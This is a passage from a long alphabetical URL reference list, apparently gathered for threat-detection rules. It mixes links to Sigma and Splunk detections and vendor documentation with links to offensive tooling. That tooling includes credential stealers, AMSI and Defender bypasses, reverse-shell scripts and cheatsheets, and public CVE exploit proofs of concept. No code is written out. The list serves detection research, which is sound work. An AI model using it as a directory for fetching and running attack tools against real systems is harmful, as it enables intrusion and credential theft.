ricardojoserf/NativeDump/blob/01d8cd17f31f51f5955a38e85cd3c83a17596175/NativeDump/Program.cs#L258\nhttps://github.com/RiccardoAncarani/LiquidSnake\nhttps://github.com/RiccardoAncarani/TaskShell/\nhttps://github.com/Ridter/cve-2020-0688\nhttps://github.com/rootm0s/WinPwnage\nhttps://github.com/ropnop/impacket_static_binaries/releases/tag/0.9.21-dev-binaries\nhttps://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/amazon.profile\nhttps://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/ocsp.profile\nhttps://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/onedrive_getonly.profile\nhttps://github.com/rsp/scripts/blob/c8bb272d68164a9836e4f273d8f924927f39b8c6/externalip-benchmark.md\nhttps://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1\nhttps://github.com/S12cybersecurity/RDPCredentialStealer\nhttps://github.com/S12cybersecurity/RDPCredentialStealer/blob/1b8947cdd065a06c1b62e80967d3c7af895fcfed/APIHookInjectorBin/APIHookInjectorBin/Inject.h#L25\nhttps://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1\nhttps://github.com/S3cur3Th1sSh1t/OffensiveVBA/blob/28cc6a2802d8176195ac19b3c8e9a749009a82a3/src/AMSIbypasses.vba\nhttps://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries\nhttps://github.com/S3cur3Th1sSh1t/SharpImpersonation\nhttps://github.com/S3cur3Th1sSh1t/WinPwn\nhttps://github.com/sadshade/veeam-creds/blob/6010eaf31ba41011b58d6af3950cffbf6f5cea32/Veeam-Get-Creds.ps1\nhttps://github.com/safedv/RustiveDump/blob/1a9b026b477587becfb62df9677cede619d42030/src/main.rs#L35\nhttps://github.com/sailay1996/awesome_windows_logical_bugs/blob/60cbb23a801f4c3195deac1cc46df27c225c3d07/dir_create2system.txt\nhttps://github.com/SaiSathvik1/Linux-Privilege-Escalation-Notes\nhttps://github.com/samratashok/ADModule\nhttps://github.com/samratashok/nishang\nhttps://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Backdoors/DNS_TXT_Pwnage.ps1\nhttps://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1\nhttps://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Shells/Invoke-PowerShellTcpOneLine.ps1\nhttps://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/44fbe85f72ee91582876b49678f9a26292a155fb/Command%20and%20Control/DE_RDP_Tunnel_5156.evtx\nhttps://github.com/search?q=CVE-2021-36934\nhttps://github.com/search?q=CVE-2021-43798\nhttps://github.com/search?q=repo%3AHackplayers%2Fevil-winrm++shell.run%28&type=code\nhttps://github.com/SecureAuthCorp/impacket/blob/7d2991d78836b376452ca58b3d14daa61b67cb40/impacket/examples/secretsdump.py#L2405\nhttps://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/atexec.py\nhttps://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/dcomexec.py\nhttps://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/smbexec.py\nhttps://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/wmiexec.py\nhttps://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py\nhttps://github.com/sense-of-security/ADRecon/blob/11881a24e9c8b207f31b56846809ce1fb189bcc9/ADRecon.ps1\nhttps://github.com/sensepost/impersonate\nhttps://github.com/sensepost/reGeorg\nhttps://github.com/sensepost/ruler\nhttps://github.com/sensepost/ruler/issues/47\nhttps://github.com/shantanu561993/SharpChisel\nhttps://github.com/Shellntel/scripts/\nhttps://github.com/SigmaHQ/sigma/blob/ad1bfd3d28aa0ccc9656240f845022518ef65a2e/documentation/logsource-guides/windows/service/security.md\nhttps://github.com/SigmaHQ/sigma/blob/master/documentation/logsource-guides/windows/service/security.md\nhttps://github.com/SigmaHQ/sigma/issues/1009\nhttps://github.com/SigmaHQ/sigma/issues/253\nhttps://github.com/SigmaHQ/sigma/issues/3742\nhttps://github.com/SigmaHQ/sigma/pull/3946\nhttps://github.com/SigmaHQ/sigma/pull/4467\nhttps://github.com/SigmaHQ/sigma/pull/5724#issuecomment-3466382234\nhttps://github.com/skelsec/pypykatz\nhttps://github.com/sleventyeleven/linuxprivchecker/\nhttps://github.com/sleventyeleven/linuxprivchecker/blob/0d701080bbf92efd464e97d71a70f97c6f2cd658/linuxprivchecker.py\nhttps://github.com/snovvcrash/DInjector\nhttps://github.com/splunk/security_content/blob/0dd6de32de2118b2818550df9e65255f4109a56d/detections/endpoint/petitpotam_network_share_access_request.yml\nhttps://github.com/splunk/security_content/blob/300af51b88ad5d5b27ce4f5f54e4d6e6a3a2c06d/detections/endpoint/office_spawning_control.yml\nhttps://github.com/splunk/security_content/blob/88d689fe8a055d8284337b9fad5d9152b42043db/detections/endpoint/petitpotam_suspicious_kerberos_tgt_request.yml\nhttps://github.com/splunk/security_content/blob/develop/detections/endpoint/office_spawning_control.yml\nhttps://github.com/splunk/security_content/blob/develop/detections/endpoint/petitpotam_suspicious_kerberos_tgt_request.yml\nhttps://github.com/sqlmapproject/sqlmap\nhttps://github.com/staaldraad/go-ntlm/blob/cd032d41aa8ce5751c07cb7945400c0f5c81e2eb/ntlm/ntlmv1.go#L427\nhttps://github.com/stamparm/maltrail/blob/3ea70459b9559134449423c0a7d8b965ac5c40ea/trails/static/suspicious/crypto_mining.txt\nhttps://github.com/surya-dev-singh/AmsiBypass-OpenSession\nhttps://github.com/swagkarna/Defeat-Defender-V1.2.0\nhttps://github.com/swagkarna/Defeat-Defender-V1.2.0/tree/ae4059c4276da6f6303b8f53cdff085ecae88a91\nhttps://github.com/SwiftOnSecurity/sysmon-config/pull/92/files\nhttps://github.com/swisskyrepo/PayloadsAllTheThings/blob/c95a0a1a2855dc0cd7f7327614545fe30482a636/Upload%20Insecure%20Files/README.md\nhttps://github.com/swisskyrepo/PayloadsAllTheThings/blob/d9921e370b7c668ee8cc42d09b1932c1b98fa9dc/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md\nhttps://github.com/synacktiv/Radmin3-Password-Cracker/blob/acfc87393e4b7c06353973a14a6c7126a51f36ac/regkey.txt\nhttps://github.com/t3l3machus/hoaxshell\nhttps://github.com/t3l3machus/Villain\nhttps://github.com/tangxiaofeng7/apache-log4j-poc\nhttps://github.com/tccontre/Reg-Restore-Persistence-Mole\nhttps://github.com/tennc/webshell\nhttps://github.com/TesterCC/exp_poc_library/blob/be61622600ec79d8fba2fa5f816a870715f0cb3b/exp_poc/CVE-2021-26084_Confluence_OGNL_injection/CVE-2021-26084.md\nhttps://github.com/TesterCC/exp_poc_library/blob/master/exp_poc/CVE-2021-26084_Confluence_OGNL_injection/CVE-2021-26084.md\nhttps://github.com/tevora-threat/SharpView/\nhttps://github.com/The-DFIR-Report/Sigma-Rules/blob/75260568a7ffe61b2458ca05f6f25914efb44337/win_mofcomp_execution.yml\nhttps://github.com/TheD1rkMtr/AMSI_patch\nhttps://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52\nhttps://github.com/ThreatHuntingProject/ThreatHunting/blob/cb22598bb70651f88e0285abc8d835757d2cb596/hunts/suspicious_process_creation_via_windows_event_logs.md\nhttps://github.com/Tib3rius/AutoRecon\nhttps://github.com/topotam/PetitPotam\nhttps://github.com/topotam/PetitPotam/blob/d83ac8f2dd34654628c17490f99106eb128e7d1e/PetitPotam/PetitPotam.cpp\nhttps://github.com/trustedsec/SysmonCommunityGuide/blob/adcdfee20999f422b974c8d4149bf4c361237db7/chapters/file-stream-creation-hash.md\nhttps://github.com/Twigonometry/Cybersecurity-Notes/blob/c875b0f52df7d2c7a870e75e1f0c2679d417931d/Writeups/Hack%20the%20Box/Boxes/Optimum/10%20-%20Website.md\nhttps://github.com/Tylous/ZipExec\nhttps://github.com/tyranid/DotNetToJScript\nhttps://github.com/usnistgov/macos_security/blob/932a51f3e819dd3e02ebfcf3ef433cfffafbe28b/rules/os/os_firmware_password_require.yaml\nhttps://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml\nhttps://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/TTPs/Defense%20Evasion/T1218%20-%20Signed%20Binary%20Proxy%20Execution/T1218.003%20-%20CMSTP/Procedures.yaml\nhttps://github.com/vanhauser-thc/thc-hydra\nhttps://github.com/vari-sh/RedTeamGrimoire/tree/668e0357072546065729ad623f8c02f7be21bb08/Doppelganger\nhttps://github.com/vari-sh/RedTeamGrimoire/tree/b5e7635d34db6e1f0398d8847e8f293186e947c5/HollowReaper\nhttps://github.com/VirtualAlllocEx/Payload-Download-Cradles/blob/88e8eca34464a547c90d9140d70e9866dcbc6a12/Download-Cradles.cmd\nhttps://github.com/vletoux/pingcastle\nhttps://github.com/vmware/open-vm-tools/blob/master/open-vm-tools/tools.conf\nhttps://github.com/vnhacker1337/CVE-2022-27925-PoC\nhttps://github.com/Voyag3r-Security/CVE-2023-1389/blob/4ecada7335b17bf543c0e33b2c9fb6b6215c09ae/archer-rev-shell.py\nhttps://github.com/vu-ls/Crassus\nhttps://github.com/vxunderground/VXUG-Papers/blob/751edb8d50f95bd7baa730adf2c6c3bb1b034276/The%20Persistence%20Series/Persistence%20via%20Recycle%20Bin/Persistence_via_Recycle_Bin.pdf\nhttps://github.com/vysecurity/Aggressor-VYSEC/blob/0d61c80387b9432dab64b8b8a9fb52d20cfef80e/ping.cna\nhttps://github.com/W01fh4cker/cve-2022-33891/blob/fd973b56e78bca8822caa3a2e3cf1b5aff5d0950/cve_2022_33891_poc.py\nhttps://github.com/wavestone-cdt/EDRSandblast\nhttps://github.com/WazeHell/sam-theadmin/blob/main/sam_the_admin.py\nhttps://github.com/Wh04m1001/CVE-2023-36874\nhttps://github.com/Wh04m1001/DiagTrackEoP/blob/3a2fc99c9700623eb7dc7d4b5f314fd9ce5ef51f/main.cpp#L22\nhttps://github.com/Wh04m1001/DiagTrackEoP/blob/3a2fc99c9700623eb7dc7d4b5f314fd9ce5ef51f/main.cpp#L46\nhttps://github.com/Wh04m1001/IDiagnosticProfileUAC\nhttps://github.com/Wh04m1001/SysmonEoP\nhttps://github.com/WickdDavid/CVE-2021-26814/blob/6a17355a10ec4db771d0f112cbe031e418d829d5/PoC.py\nhttps://github.com/wildptr-io/Winrar-CVE-2023-40477-POC\nhttps://github.com/win3zz/CVE-2023-25157\nhttps://github.com/win3zz/CVE-2023-43261\nhttps://github.com/winsiderss/systeminformer\nhttps://github.com/WiredPulse/Invoke-HiveNightmare\nhttps://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv\nhttps://github.com/wpscanteam/wpscan/blob/196fbab5b1ce3870a43515153d4f07878a89d410/lib/wpscan/browser.rb\nhttps://github.com/wunderwuzzi23/firefox-cookiemonster\nhttps://github.com/x1sec/CVE-2019-19781/blob/25f7ab97275b2d41800bb3414dac8ca3a78af7e5/CVE-2019-19781-DFIR.md\nhttps://github.com/xephora/Threat-Remediation-Scripts/tree/main/Threat-Track/CS_INSTALLER\nhttps://github.com/XForceIR/SideLoadHunter/blob/cc7ef2e5d8908279b0c4cee4e8b6f85f7b8eed52/SideLoads/README.md\nhttps://github.com/xmendez/wfuzz/blob/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/docs/user/basicusage.rst\nhttps://github.com/xmrig/xmrig/blob/427b6516e0550200c17ca28675118f0fffcc323f/src/version.h\nhttps://github.com/xmrig/xmrig/blob/da22b3e6c45825f3ac1f208255126cb8585cd4fc/src/base/kernel/Platform_win.cpp#L65\nhttps://github.com/xmrig/xmrig/tree/master/bin/WinRing0\nhttps://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1\nhttps://github.com/xuanxuan0/DripLoader\nhttps://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md\nhttps://github.com/yardenshafir/conference_talks/blob/3de1f5d7c02656c35117f067fbff0a219c304b09/OffensiveCon_2023_Your_Mitigations_are_My_Opportunities.pdf\nhttps://github.com/yarrick/iodine\nhttps://github.com/Yaxser/Backstab\nhttps://github.com/yeyintminthuhtut/Malleable-C2-Profiles-Collection/\nhttps://github.com/YfryTchsGD/Log4jAttackSurface\nhttps://github.com/Ylianst/MeshAgent\nhttps://github.com/Ylianst/MeshAgent/blob/52cf129ca43d64743181fbaf940e0b4ddb542a37/modules/win-info.js#L55\nhttps://github.com/zcgonvh/EfsPotato\nhttps://github.com/zcgonvh/NTDSDumpEx\nhttps://github.com/zeek/zeek/blob/691b099de13649d6576c7b9d637f8213ff818832/scripts/base/protocols/dce-rpc/consts.zeek\nhttps://github.com/zeronetworks/rpcfirewall\nhttps://github.com/zerosum0x0/CVE-2019-0708\nhttps://github.security.telekom.com/2023/08/darkgate-loader.html\nhttps://githubmemory.com/repo/FunctFan/JNDIExploit\nhttps://giuliocomi.blogspot.com/2019/10/abusing-windows-10-narrators-feedback.html\nhttps://global.ptsecurity.com/analytics/pt-esc-threat-intelligence/darkhotel-a-cluster-of-groups-united-by-common-techniques\nhttps://go.recordedfuture.com/hubfs/reports/mtp-2021-0914.pdf\nhttps://goo.gl/PsqrhT\nhttps://googleprojectzero.blogspot.com/2019/08/implant-teardown.html\nhttps://grafana.com/blog/2021/12/07/grafana-8.3.1-8.2.7-8.1.8-and-8.0.7-released-with-high-severity-security-fix/\nhttps://grep.app/search?q=winpwn&filter[repo][0]=redcanaryco/atomic-red-team\nhttps://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c\nhttps://gtfobins.github.io/gtfobins/apt-get/\nhttps://gtfobins.github.io/gtfobins/apt/\nhttps://gtfobins.github.io/gtfobins/awk/#shell\nhttps://gtfobins.github.io/gtfobins/c89/#shell\nhttps://gtfobins.github.io/gtfobins/c99/#shell\nhttps://gtfobins.github.io/gtfobins/curl/\nhttps://gtfobins.github.io/gtfobins/env/#shell\nhttps://gtfobins.github.io/gtfobins/find/#shell\nhttps://gtfobins.github.io/gtfobins/flock/#shell\nhttps://gtfobins.github.io/gtfobins/git/#shell\nhttps://gtfobins.github.io/gtfobins/mawk/#shell\nhttps://gtfobins.github.io/gtfobins/nawk/#shell\nhttps://gtfobins.github.io/gtfobins/nice/#shell\nhttps://gtfobins.github.io/gtfobins/nohup/\nhttps://gtfobins.github.io/gtfobins/python/#shell\nhttps://gtfobins.github.io/gtfobins/rvim/\nhttps://gtfobins.github.io/gtfobins/ssh/\nhttps://gtfobins.github.io/gtfobins/vim/\nhttps://gtfobins.github.io/gtfobins/vimdiff/\nhttps://gtfobins.github.io/gtfobins/wget/\nhttps://guides.lib.umich.edu/c.php?g=282942&p=1885348\nhttps://h.43z.one/ipconverter/\nhttps://hackingiscool.pl/cmdhijack-command-argument-confusion-with-path-traversal-in-cmd-exe/\nhttps://harfanglab.io/insidethelab/uac-0057-pressure-ukraine-poland/\nhttps://hashcat.net/wiki/doku.php?id=hashcat\nhttps://hatching.io/blog/powershell-analysis/\nhttps://hausec.com/2021/07/26/cobalt-strike-and-tradecraft/\nhttps://help.duo.com/s/article/6327?language=en_US\nhttps://help.okta.com/en-us/Content/Topics/users-groups-profiles/usgp-create-character-restriction.htm\nhttps://hijacklibs.net/\nhttps://hijacklibs.net/entries/3rd_party/google/chrome_frame_helper.html\nhttps://hijacklibs.net/entries/3rd_party/oracle/jli.html\nhttps://hijacklibs.net/entries/3rd_party/vlc/libvlc.html\nhttps://hijacklibs.net/entries/microsoft/built-in/dbgmodel.html\nhttps://hijacklibs.net/entries/microsoft/built-in/mpsvc.html\nhttps://hijacklibs.net/entries/microsoft/built-in/mscorsvc.html\nhttps://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-5-user-guide.pdf\nhttps://hunter2.gitbook.io/darthsidious/execution/responder-with-ntlm-relay-and-empire\nhttps://hunter2.gitbook.io/darthsidious/other/war-stories/domain-admin-in-30-minutes\nhttps://hunter2.gitbook.io/darthsidious/privilege-escalation/mimikatz\nhttps://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART2.txt\nhttps://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf\nhttps://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/\nhttps://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-20-638.jpg\nhttps://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-48-638.jpg\nhttps://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-50-638.jpg\nhttps://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-74-638.jpg\nhttps://image.slidesharecdn.com/zeronights2017kheirkhabarov-171118103000/75/hunting-for-credentials-dumping-in-windows-environment-57-2048.jpg?cb=1666035799\nhttps://imagemagick.org/\nhttps://in.security/an-intro-into-abusing-and-identifying-wmi-event-subscriptions-for-persistence/\nhttps://infosec.exchange/@sbousseaden/109542254124022664\nhttps://infosecwriteups.com/amsi-bypass-new-way-2023-d506345944e9\nhttps://inquest.net/blog/2018/06/22/a-look-at-formbook-stealer\nhttps://insight-jp.nttsecurity.com/post/102hojk/operation-restylink-apt-campaign-targeting-japanese-companies\nhttps://insights.sei.cmu.edu/blog/the-dangers-of-vhd-and-vhdx-files/\nhttps://int0x33.medium.com/day-44-linux-capabilities-privilege-escalation-via-openssl-with-selinux-enabled-and-enforced-74d2bec02099\nhttps://intel.thedfirreport.com/events/view/30032\nhttps://intezer.com/blog/research/how-we-escaped-docker-in-azure-functions/\nhttps://intezer.com/wp-content/uploads/2021/09/TeamTNT-Cryptomining-Explosion.pdf\nhttps://invictus-ir.medium.com/ransomware-in-the-cloud-7f14805bbe82\nhttps://ipfyx.fr/post/visual-studio-code-tunnel/\nhttps://ipurple.team/2024/07/15/sharphound-detection/\nhttps://ipurple.team/2024/09/10/browser-stored-credentials/\nhttps://ired.team/offensive-security/code-execution/code-execution-through-control-panel-add-ins\nhttps://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass\nhttps://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd\nhttps://isc.sans.edu/diary/22264\nhttps://isc.sans.edu/diary/25686\nhttps://isc.sans.edu/diary/26734\nhttps://isc.sans.edu/diary/IPFS%20phishing%20and%20the%20need%20for%20correctly%20set%20HTTP%20security%20headers/29638\nhttps://isc.sans.edu/diary/Microsoft+BITS+Used+to+Download+Payloads/21027\nhttps://isc.sans.edu/diary/More+Data+Exfiltration/25698\nhttps://isc.sans.edu/diary/Wipe+the+drive+Stealthy+Malware+Persistence+Mechanism+-+Part+1/15394\nhttps://isc.sans.edu/forums/diary/Active+Directory+Certificate+Services+ADCS+PKI+domain+admin+vulnerability/27668/\nhttps://isc.sans.edu/forums/diary/Desktopini+as+a+postexploitation+tool/25912/\nhttps://isc.sans.edu/forums/diary/Investigating+Microsoft+BITS+Activity/23281/\nhttps://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/\nhttps://jamesonhacking.blogspot.com/2020/12/pivoting-to-private-aws-s3-buckets.html\nhttps://jasonmull.com/articles/offensive/2025-05-12-windows-crash-dumps-offensive-security/\nhttps://jdhnet.wordpress.com/2017/12/19/changing-the-location-of-the-windows-event-logs/\nhttps://jonconwayuk.wordpress.com/2014/01/31/wmic-csproduct-using-wmi-to-identify-make-and-model-of-hardware/\nhttps://jpcertcc.github.io/ToolAnalysisResultSheet\nhttps://jpcertcc.github.io/ToolAnalysisResultSheet/details/nltest.htm\nhttps://jpcertcc.github.io/ToolAnalysisResultSheet/details/ntdsutil.htm\nhttps://jpcertcc.github.io/ToolAnalysisResultSheet/details/PowerSploit_Invoke-Mimikatz.htm\nhttps://jpcertcc.github.io/ToolAnalysisResultSheet/details/QuarksPWDump.htm\nhttps://jpcertcc.github.io/ToolAnalysisResultSheet/details/sdelete.htm\nhttps://jpcertcc.github.io/ToolAnalysisResultSheet/details/WCE.htm\nhttps://jsecurity101.medium.com/bypassing-access-mask-auditing-strategies-480fb641c158\nhttps://jstnk9.github.io/jstnk9/research/GobRAT-Malware/\nhttps://jstnk9.github.io/jstnk9/research/InstallScreenSaver-SCR-files\nhttps://jstnk9.github.io/jstnk9/research/Jlaive-Antivirus-Evasion-Tool\nhttps://kb.acronis.com/content/60892\nhttps://kb.cert.org/vuls/id/843464\nhttps://kb.eventtracker.com/evtpass/evtpages/EventId_6004_Microsoft-Windows-DNS-Server-Service_65410.asp\nhttps://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784\nhttps://kb.vmware.com/s/article/85717\nhttps://klausjochem.me/2016/02/03/netsh-the-cyber-attackers-tool-of-choice/\nhttps://kostas-ts.medium.com/detecting-abuse-of-openedrs-permissive-edr-trial-a-security-researcher-s-perspective-fc55bf53972c\nhttps://krebsonsecurity.com/2018/06/bad-men-at-work-please-dont-click/\nhttps://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/\nhttps://kubernetes.io/docs/concepts/workloads/controllers/job/\nhttps://kubernetes.io/docs/reference/access-authn-authz/rbac/\nhttps://kubernetes.io/docs/reference/kubernetes-api/authorization-resources/cluster-role-v1/#ClusterRole\nhttps://kubernetes.io/docs/tasks/manage-kubernetes-objects/update-api-object-kubectl-patch\nhttps://lab52.io/blog/2344-2/\nhttps://lab52.io/blog/new-mustang-pandas-campaing-against-australia/\nhttps://lab52.io/blog/snake-keylogger-in-geopolitical-affairs-abuse-of-trusted-java-utilities-in-cybercrime-operations/\nhttps://lab52.io/blog/winter-vivern-all-summer/\nhttps://labs.f-secure.com/blog/detecting-cobalt-strike-default-modules-via-named-pipe-analysis/\nhttps://labs.f-secure.com/blog/prelude-to-ransomware-systembc\nhttps://labs.f-secure.com/blog/scheduled-task-tampering/\nhttps://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone\nhttps://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/\nhttps://labs.sentinelone.com/meteorexpress-mysterious-wiper-paralyzes-iranian-trains-with-epic-troll\nhttps://labs.sentinelone.com/sarwent-malware-updates-command-detonation/\nhttps://labs.sentinelone.com/the-anatomy-of-an-apt-attack-and-cobaltstrike-beacons-encoded-configuration/\nhttps://labs.sentinelone.com/top-tier-russian-organized-cybercrime-group-unveils-fileless-stealthy-powertrick-backdoor-for-high-value-targets/\nhttps://labs.watchtowr.com/guess-who-would-be-stupid-enough-to-rob-the-same-vault-twice-pre-auth-rce-chains-in-commvault/\nhttps://labs.watchtowr.com/xortigate-or-cve-2023-27997/\nhttps://labs.withsecure.com/content/dam/labs/docs/f-secureLABS-tlp-white-lazarus-threat-intel-report2.pdf\nhttps://labs.withsecure.com/publications/add-in-opportunities-for-office-persistence\nhttps://labs.withsecure.com/publications/detecting-onenote-abuse\nhttps://labs.withsecure.com/publications/fin7-target-veeam-servers\nhttps://labs.withsecure.com/publications/fin7-target-veeam-servers/jcr:content/root/responsivegrid/responsivegrid/responsivegrid/image_253944286.img.png/1682500394900.png\nhttps://labs.withsecure.com/publications/kapeka\nhttps://ladydebug.com/blog/2019/06/21/custom-protocol-handler-cph/\nhttps://learn.microsoft.com/de-de/microsoft-365/enterprise/urls-and-ip-address-ranges?view=o365-worldwide\nhttps://learn.microsoft.com/de-de/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.3\nhttps://learn.microsoft.com/en-gb/entra/architecture/security-operations-privileged-accounts\nhttps://learn.microsoft.com/en-gb/entra/architecture/security-operations-user-accounts\nhttps://learn.microsoft.com/en-gb/entra/architecture/security-operations-user-accounts#monitoring-external-user-sign-ins\nhttps://learn.microsoft.com/en-gb/sysinternals/downloads/sdelete\nhttps://learn.microsoft.com/en-gb/windows-server/administration/windows-commands/ksetup\nhttps://learn.microsoft.com/en-us/answers/questions/253555/software-list-inventory-wmic-product\nhttps://learn.microsoft.com/en-us/answers/questions/739120/how-to-add-re-write-global-rule-with-action-type-r\nhttps://learn.microsoft.com/en-us/archive/blogs/jonathantrull/detecting-sticky-key-backdoors\nhttps://learn.microsoft.com/en-us/archive/blogs/pki/basic-crl-checking-with-certutil\nhttps://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins\nhttps://learn.microsoft.com/en-us/azure/active-directory/authentication/howto-mfa-userstates\nhttps://learn.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-monitor-federation-changes\nhttps://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#activity-from-anonymous-ip-address\nhttps://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#anomalous-token\nhttps://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#anomalous-user-activity\nhttps://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#anonymous-ip-address\nhttps://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#atypical-travel\nhttps://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#azure-ad-threat-intelligence-sign-in\nhttps://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#azure-ad-threat-intelligence-user\nhttps://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#impossible-travel\nhttps://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#leaked-credentials\nhttps://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#malicious-ip-address\nhttps://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#malware-linked-ip-address-deprecated\nhttps://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#new-country\nhttps://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#password-spray\nhttps://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#possible-attempt-to-access-primary-refresh-token-prt\nhttps://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#suspicious-browser\nhttps://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#suspicious-inbox-forwarding\nhttps://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#suspicious-inbox-manipulation-rules\nhttps://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#token-issuer-anomaly\nhttps://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#unfamiliar-sign-in-properties\nhttps://learn.microsoft.com/en-us/azure/active-directory/privileged-identity-management/pim-how-to-configure-security-alerts#administrators-arent-using-their-privileged-roles\nhttps://learn.microsoft.com/en-us/azure/active-directory/privileged-identity-management/pim-how-to-configure-security-alerts#potential-stale-accounts-in-a-privileged-role\nhttps://learn.microsoft.com/en-us/azure/active-directory/privileged-identity-management/pim-how-to-configure-security-alerts#roles-are-being-activated-too-frequently\nhttps://learn.microsoft.com/en-us/azure/active-directory/privileged-identity-management/pim-how-to-configure-security-alerts#roles-are-being-assigned-outside-of-privileged-identity-management\nhttps://learn.microsoft.com/en-us/azure/active-directory/privileged-identity-management/pim-how-to-configure-security-alerts#roles-dont-require-multi-factor-authentication-for-activation\nhttps://learn.microsoft.com/en-us/azure/active-directory/privileged-identity-management/pim-how-to-configure-security-alerts#the-organization-doesnt-have-microsoft-entra-premium-p2-or-microsoft-entra-id-governance\nhttps://learn.microsoft.com/en-us/azure/active-directory/privileged-identity-management/pim-how-to-configure-security-alerts#there-are-too-many-global-administrators\nhttps://learn.microsoft.com/en-us/azure/defender-for-cloud/file-integrity-monitoring-overview#which-files-should-i-monitor\nhttps://learn.microsoft.com/en-us/azure/developer/dev-tunnels/security\nhttps://learn.microsoft.com/en-us/azure/dns/dns-zones-records\nhttps://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations\nhttps://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftauthorization\nhttps://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy\nhttps://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference\nhttps://learn.microsoft.com/en-us/defender-endpoint/attack-surface-reduction\nhttps://learn.microsoft.com/en-us/defender-endpoint/attack-surface-